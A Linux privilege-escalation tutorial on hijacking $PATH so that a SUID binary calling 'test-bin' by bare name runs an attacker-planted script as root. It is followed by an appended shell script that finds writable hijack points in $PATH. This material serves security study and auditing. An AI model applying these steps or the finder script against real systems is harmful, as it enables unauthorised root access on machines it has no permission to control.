$PATH
$PATH environment variable
$ echo $PATH
Possible exploitable scenarios
Case 1: the named script is not defined anywhere in $PATH
A binary with the SUID bit set (/usr/bin/bin-with-suid) is found to execute a particular named script without an absolute path, and no script of that name exists in any directory listed in $PATH. Assume the named script that is executed is test-bin. (On Linux the SUID bit only takes effect on compiled binaries, not on interpreted scripts, so the target here is a SUID binary that runs a command by bare name.)
$ find / -perm -u=s -type f 2>/dev/null
/usr/bin/bin-with-suid
$ /usr/bin/bin-with-suid
# error message indicating that test-bin is executed, but not found
sh: 1: test-bin: not found
The error comes from /bin/sh, so the binary runs the command through a shell (for example with system()), and that shell resolves test-bin by searching the directories in $PATH from left to right. Two sub-cases:
a) $PATH environment variable can be edited ONLY
b) Write permissions for a directory listed in the $PATH environment variable ONLY
Scenario a)
$ echo $PATH
/usr/local/sbin:/usr/local/bin ...
$ export PATH=/tmp:$PATH
$ echo $PATH
/tmp:/usr/local/sbin:/usr/local/bin ...
$ cd /tmp
$ nano test-bin
#!/...
...
$ chmod +x test-bin
$ /usr/bin/bin-with-suid
... executes /tmp/test-bin with ROOT privileges
This works because the binary inherits our environment, including the edited $PATH, instead of resetting it or calling test-bin by absolute path; the script must be executable, otherwise the shell skips it. Keep in mind that bash drops an effective UID that differs from the real UID unless it is started with -p, so a test-bin whose interpreter is bash will not keep root by itself.
Scenario b)
Create test-bin in the directory of $PATH that we can write to. Since no other test-bin exists in any directory of $PATH, the position of that directory in $PATH does not matter: the first and only match is ours, and the SUID binary executes it with root privileges.
Case 2: the named script is defined
A binary with the SUID bit set (/usr/bin/bin-with-suid) is found to execute a named script that does exist in a directory of $PATH. Assume the named script that is executed is test-bin (present in /usr/local/bin/).
a) $PATH environment variable can be edited ONLY
b) Write permissions for a directory listed in the $PATH environment variable ONLY
Scenario a)
Prepend a writable directory such as /tmp to the $PATH environment variable (export PATH=/tmp:$PATH) and create, in that directory, an executable script with the same name as the one executed by the SUID binary. Because the shell searches the directories in $PATH from left to right and stops at the first match, /tmp/test-bin is found before /usr/local/bin/test-bin and is executed with root privileges.
Scenario b)
There are 2 further possible scenarios:
1) The directory we have write permissions for appears before the directory where the named script is found. This lets us trick the SUID binary into executing a script defined by us instead, because the shell searches the directories listed in $PATH from left to right and stops at the first match. Assume that we have write permissions for the directory /usr/local/sbin, and this directory appears to the left of /usr/local/bin (the directory of the original script) in $PATH: creating an executable /usr/local/sbin/test-bin makes the SUID binary run our script. If the writable directory appears to the right of /usr/local/bin instead, the original script is always found first and this approach does not work.
2) We have write permissions for the actual path of the named script (/usr/local/bin/test-bin, or its directory /usr/local/bin). Overwrite or replace the script with our own; its position in $PATH is then irrelevant, since the first match is the file we control.
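As an added example (not from the original page), the left-to-right $PATH search that both cases rely on, reproduced as shell functions: path_resolve reports the directory a shell would run a command from, and path_hijack_dir reports the first directory in $PATH where creating or overwriting the command would make the SUID binary run our file, covering the not-defined case, the writable-directory-before case and the overwrite-the-real-script case. The function names and the test-bin layout that demo builds under a temporary directory are this example's own assumptions.

```shell
#!/bin/sh
# Added example, not code from the original page. The functions reproduce
# the left-to-right search a shell performs on $PATH when a SUID binary
# runs a command by bare name. Names (path_resolve, path_hijack_dir, demo)
# and the constructed test-bin layout are assumptions of this example.

# path_resolve NAME PATHSTRING
#   prints the directory in PATHSTRING from which the shell would run NAME;
#   returns 1 if NAME is not found in any listed directory.
path_resolve() (
    name=$1
    IFS=:                          # subshell body: IFS change stays local
    for dir in $2; do
        [ -n "$dir" ] || dir=.     # an empty entry means the current directory
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            printf '%s\n' "$dir"
            exit 0
        fi
    done
    exit 1
)

# path_hijack_dir NAME PATHSTRING
#   prints the first directory in PATHSTRING where creating NAME (or
#   overwriting the real NAME) makes the shell run our file; returns 1 if
#   nothing searched up to and including the real NAME is writable to us.
path_hijack_dir() (
    name=$1
    IFS=:
    for dir in $2; do
        [ -n "$dir" ] || dir=.
        if [ -f "$dir/$name" ] && [ -x "$dir/$name" ]; then
            # The real command is found here and the search stops. Only
            # overwriting this file, or replacing it in a writable directory,
            # still works; entries further to the right are never consulted.
            if [ -w "$dir/$name" ] || [ -w "$dir" ]; then
                printf '%s\n' "$dir"
                exit 0
            fi
            exit 1
        fi
        if [ -d "$dir" ] && [ -w "$dir" ]; then
            # No file of that name here and we can create one: this entry is
            # searched before the real command (if any), so our file wins.
            printf '%s\n' "$dir"
            exit 0
        fi
    done
    exit 1
)

# Demonstration on a constructed layout under a temporary directory:
# "bin" holds a read-only real test-bin, "tmp" is an empty writable directory.
# (As root, [ -w ] is true for everything, so the last line reports bin.)
demo() {
    base=$(mktemp -d)
    mkdir "$base/tmp" "$base/bin"
    printf '#!/bin/sh\necho real test-bin\n' > "$base/bin/test-bin"
    chmod 555 "$base/bin/test-bin" "$base/bin"
    echo "shell would run test-bin from: $(path_resolve test-bin "$base/tmp:$base/bin")"
    echo "writable entry before it, hijack from: $(path_hijack_dir test-bin "$base/tmp:$base/bin")"
    echo "writable entry only after it: $(path_hijack_dir test-bin "$base/bin:$base/tmp" || echo 'not hijackable')"
    chmod 755 "$base/bin" && rm -rf "$base"
}
demo
```

Run the check from the shell the SUID binary is launched from, with the name the binary executes and the $PATH it will inherit, for example path_hijack_dir test-bin "$PATH". The writability tests are evaluated for the current user, so the answer differs between users; as root every directory reports as writable.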